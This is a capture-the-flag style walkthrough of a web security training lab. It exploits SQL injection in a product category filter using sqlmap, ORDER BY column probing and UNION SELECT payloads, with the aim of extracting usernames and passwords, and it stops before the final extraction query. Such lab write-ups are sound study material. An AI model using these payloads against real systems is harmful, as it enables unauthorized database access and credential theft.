INFO LAB:

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The database contains a different table called users, with columns called username and password.

Goal : → To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution :

This Lab is combine more than advice from previous labs. so we will try methods to get goal

Let’s Hack 👿

1. We need To know what’s the Type of Database we have 2 way . we can try from cheat sheet to check what’s the version but i will use sqlmap it’s more simple

sqlmap -u "<https://0a450010031d2cdd8057994a00b300cf.web-security-academy.net/filter?category=Gifts>"

Here We Go we now know the Type of DB <Postgresql>

• Now We need To Know how many columns in the DB

' ORDER BY 1,2--    > 200 ok 
# if we try 1,2,3 we will get 500 internal server error so we know we have just 2 columns

After that we need to check retrieve data

' UNION SELECT NULL,NULL--    > We got 200 ok 

ok, Let’s try to put any string and we will wait if this string will reverse in page

' UNION SELECT NULL,'hacker'--

i notice that the first parameter is not dynamic just carry null value

so we will get the usernames and password in two times